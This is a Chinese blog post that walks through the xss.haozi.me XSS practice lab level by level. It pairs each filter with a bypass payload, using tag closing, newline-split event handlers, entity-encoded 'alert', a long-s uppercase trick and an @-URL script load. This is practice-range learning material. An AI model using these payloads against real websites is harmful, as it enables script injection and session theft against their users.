XSS靶场(二)xss.haozi

最新推荐文章于 2024-08-07 19:58:40 发布
最新推荐文章于 2024-08-07 19:58:40 发布
阅读量322 收藏 3
点赞数
分类专栏: Web攻防 文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C_LCH_2000/article/details/126031637
版权

XSS防御 HTML特性 正则表达式 编码转义 绕过过滤
关键词由CSDN通过智能技术生成

靶机地址:https://xss.haozi.me

0x00 

无防

<script>alert(1)</script>

 0x01

<textarea>标签这个标签内,所有的脚本语言都是字符串,不能被调用执行,闭合标签即可;

</textarea><script>alert(1)</script>

 0x02

 闭合" < 即可

"><script>alert(1)</script>
aaa" onclick="alert(1)

 0x03

正则表达式,将 () 替换为空,用 `` 代替即

<script>alert`1`</script>

0x04

正则表达式,将 () `` 替换为空,HTML实体编码 &#40;&#41;

<svg><script>alert&#40;1&#41;</script>

 0x05

这里用正则替换了-->html的注释符有2种写法:

<!-- 注释的内容 --> 另一种是<!-- 注释的内容 --!> 

--!><script>alert(1)</script>

 0x06

这里正则替换的是auto和on.*=和>字符,所以过滤了js的autofocus事件以及 on开头的事件;

但没有过滤换行,可以利用HTML的容错机制,只要关键字和语法正确,不受空格和换行符影响的特性

onclick
=alert(1)

onmousedown
=alert(1)

type=image src=1 onerror
=alert(1)

 0x07

 正则 <\/?[^>]+> 这一堆,以 "<" 开头 ">" 结尾中间穿插非 ">" 的不分大小写的字符串,

总的来说,就是替换 </ 任意字符 > 为空。用<svg标签和THTML容错机制不写 ">" 即可

<svg onload=alert(1)//

<svg onload=alert(1)\n

<img src=1 onerror="alert(1)"

0x08 

用正则过滤了</style>,致使无法闭合;

和6 7题类似,还是利用HTML的容错给</style 后面加空格或回车

</style ><script>alert(1)</script>

</style
><script>alert(1)</script>

0x09

用正则规定输入的字符串种必须有https://www.segmentfault.com1;

那就再在后面写," 闭合 ></script> 闭合,再注掉 ">

https://www.segmentfault.com1"></script><script>alert(1)//

 0x0A 

于上一题类似,另外把 ' " < > / 都过滤了

在网址中间使用@符号,将重定向到@后面的域URL;(谷歌貌似有个保护机制,在火狐试)

https://www.segmentfault.com@xss.haozi.me/j.js

0x0B

把输⼊的字符串都转⼤写了;

html对大小写不敏感,JS对大小写敏感;

用<svg οnlοad=alert(1)>,对 'alert' 实体编码;

<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>

 

 0x0C

和上一题类似,只是多了个对script 的过滤;

如果用<script>,双写即可;

<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

<sscriptcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></sscriptcript>

 0x0D

 正则过滤了 < / " ' ,可以不用;

回车逃逸单行注释,再注掉多余的 ‘)

这里回车
alert(1)
-->

0x0E 

这里的正则匹配<a-zA-Z>,还给< 后面加上了_, 并且转大写,这几乎过滤了所有的标签;

所以要用到一个奇技淫巧:有这样一个字符 ſ ,它在转大写后会变成S;

<ſcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></script>

<ſvg onload=&#97;&#108;&#101;&#114;&#116;(1)>

 0x0F

这里和第十题差不多,将 & ' " <> / 给HTML实体编码了;

但值得注意的是,我们输入的字符仍处于html中,因此即使被编码也可以执行其功能;

闭合前后 (' ') 或注掉 即可;

');alert(1);('

 0x10

无防,给data个值即可;

');alert(1);('

 0x11

和15题一样,把 / ’ " ` < > \ 以及换行等给转义了;

闭合前后 (" ") 即可;

在JS代码里对 / 的转义其实是多此一举,在实际使用中,/ 并非特殊符号,无需转义,可直接输出

");alert(1);("

");alert(1);//

0x12

将 " 给转义了;

我要双引号干啥,直接闭合前面的<script>,再把后面的 ')  给注掉 即可;

也可以将 \ 给转义,让其失效,再闭合 (" 

</script><script>alert(1)//

a\");alert(1);//

 ok搞定!个人习惯不同,答案不唯一,如果有不同解法,欢迎大家分享!

树迷了路
关注
专栏目录
xss.haozi.me靶机
newlife1441的博客
07-28 349
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
XSS线上靶场---haozi
qq_52016943的博客
07-29 1288
XSS 在线靶场
XXS靶场haozi
m0_61579490的博客
08-02 550
XXS靶场之线上靶场haozi
XSS漏洞:xss.haozi.me靶场1-12 | A-F
weixin_68416970的博客
07-28 2837
XSS漏洞靶场xss.haozi.me靶场的1-12关、A-F关通关教程
XSS靶场haozi.me)
weixin_52240463的博客
08-15 985
一边看题解一边打了一个下午终于通关 小rookie一个比较菜 很多不会的地方查了很多资料 可能有部分思路和别的地方又雷同 各位姥爷看看就好 目录 0x00 送分题啥过滤没有​ 0x01​textarea 字面意思是文本域 类似text类型 不能触发xss 需要闭合 0x02 0x03 0x04​ 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 送分题啥过滤没有 0x01tex...
XSS-haozi
个人博客
08-10 369
https://xss.haozi.me/ XSS学习 github项目地址:haozi/xss-demo: ????????‍♂️ xss 攻防靶场,issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser
xss.haozi靶场通关
qq_31088019的博客
07-29 361
xss.haozi靶场通关
xss靶场练习之xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 1042
靶场绕过
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 700
一个在线的XSS练习靶场19关全带通关答案
xss.haozi.me弹窗练习0x00-0x10
weixin_52159400的博客
07-28 637
alert(1)
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2185
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi靶场详解
最新发布
weixin_62457642的博客
08-07 563
haozi靶场速刷
xss靶场在线靶场
小白的博客
09-09 936
xss靶场在线靶场
xss-haozi.me靶场通关
2301_80185313的博客
07-18 1047
xss-haozi.me靶场通关详解
XSS简单在线靶场
qq_51979295的博客
09-19 524
反射型xss在线靶场通关
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值